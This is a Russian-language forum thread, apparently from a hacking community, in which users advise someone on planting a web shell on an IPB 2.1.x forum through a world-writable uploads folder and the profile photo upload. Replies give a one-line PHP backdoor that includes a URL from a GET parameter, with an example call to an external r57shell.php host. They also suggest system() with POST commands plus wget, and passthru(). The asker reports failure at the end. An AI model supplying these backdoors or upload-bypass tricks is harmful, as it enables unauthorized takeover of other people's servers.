Что можно сделать, если нашел папку 0777

Есть на форуме папка с Chmod 0777
Можно как-нить в неё загрузить файл?

 

какие у тебя права и т.д?

 

Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -))
Тоесть просто так всё равно ничё это не даёт.

 

форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...

 

Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются...
Шелл должен работать

 

переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи.
шелл весит 100 кб )...нужно что-то поменьше

 

Есть шеллы поменьше

 

Сложно подумать =\

Создай файл file.php.jpg
С содержимым:

PHP:

<?php
if(isset($_GET['xek'])) include($_GET['xek']);
?>

И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php

 

на некоторых хостах запрещен ремоут инклуд. так что лучше system($_POST['cmd']); а потом wget

 

На некоторых хостах запрещен system

 

Isis твой вариант не работает

 

passthru()

мало в это верится.

 

мне бы по популярнее объяснить, напр как Isis

 

Стоп!

Вообщем создай в файле

PHP:

<?php
if(isset($_GET['xek'])) echo "XEEEEEEEEEK, я с античата!!!!!!!!!";
?>

Аналогично сделай
Если ничего не выведет, увы

 

ни-че-го ... спасибо всем за потраченное время)